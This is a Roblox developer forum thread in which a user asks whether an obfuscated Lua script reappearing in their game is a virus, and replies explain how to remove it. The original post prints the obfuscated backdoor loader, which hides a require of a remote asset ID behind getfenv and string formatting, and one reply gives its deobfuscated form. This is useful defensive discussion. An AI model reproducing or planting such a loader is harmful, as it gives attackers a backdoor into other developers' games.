Is this script a virus?

Help and Feedback Scripting Support
#1

Hello, i didnt used any free models, except the HD Admin, is this script a virus?

local h = setmetatable;
local i = string.format;
local b = getfenv()
local to = tonumber
local ov = "5698"
local ch = "qui"
local lv = pcall
local t = {
	[1]="bees",
	[2]=i("e%sr%soS%sek%siL","c","u","d","n");
	[3]=i("d%sl%sas%sD","e","b","i");
	[4]=i("tn%sr%sP","e","a");
};
local u = {
	__index = function()
		lv(function()b()["re"..ch.."re"](ov .. "193573")end)
	end;
};
h(t,u);

local v = {
	[1]="bees";
};
local w = {
	__index = function(table,i)
		local bees = t[5];
	end;
};
h(v,w);
local joe = v[2];

image
its not deleteable, it keeps refreshing

2 Likes
#2

First of all, HD Admin is always reliable if its the OFFICIAL one.

Check and see if the model you used for the HD Admin is by @ForeverHD If any other person made it then its a guaranteed virus script.

#3

Some plugin is reinserting it, do you have any plugins ? Also, yes it is a virus bc of that weird numbers

1 Like
#4

If it won’t delete, then revert the game version. I’ve never seen a script called “Core Loader” in the HD Admin model.

90% chance it’s a model with a virus.

#5

If he confirms it’s the official hd admin, it’s a plugin virus.

1 Like
#6

The only plugin for HD Admin i know of is Nanoblox, but thats it.

#7

I meant another plugin not hd’s.

#8

it happened when my friend joined team create, could it be HIS plugin?

#9

Maybe try going to another game,if that coreloader script dosent exist than it’s his. Or, maybe he made the virus itself and injected a script in coregui with his malicious plugin to make it reinsertable

#10

Hello, so basically someone is requiring a module with the following line of code require(5698193573), you can look up this model by ID and check if its a backdoor or nah, have a good day.
-Rowan

1 Like
#11

If you see something like this where someone is doing getfenv()["require"] it’s probably a virus. Specifically b is getfenv(), ch is qui. It’s requiring this asset 5698193573, which requires 7105947983, which in turn requires 7105936966, and at this point you should be able to tell something’s not right. The ending resolution I saw is that it literally just does return 1 and says “baited”, but regardless, it’s not healthy for your game.

Read below for a better inspection, I didn’t see the skybox until I downloaded the rbxm myself.

You probably have a plugin that keeps inserting it. Make sure all your plugins are from reputable sources.

1 Like
#12

Means:

pcall(function() -- Does not error if source was removed
    -- getfenv()[require](5698193573)
    require(5698193573)
end)

Going in to the model source code only returns one main module that goes to another require id and a skybox which is the model thumbnail

Going to the require id inside the model is obfuscated

Conclusion: Virus

Also remove sus plugins like Tree Generator or something like Light Editor that only have a few favourites

#13

If it keeps refreshing then you likely have a malicious plugin installed, comb through your current plugins and get rid of any which seem suspicious. Then attempt to delete the script.

#14

Just an addition , if issue persists you should enable show hidden services than look for malicious scripts outside visible services, most of them hide the scripts in CSGDictionaryService or Coregui if you can’t find it in these 2 services, look in other hidden services.

#15

If Team Create is on, disable it and ask your friend to check his plugins if they are malicious.
Also check your plugins too. Perhaps one of them is inserting this script which seems to be a backdoor.
Try to get plugins from a trusted source, you probably installed a spammed plugin.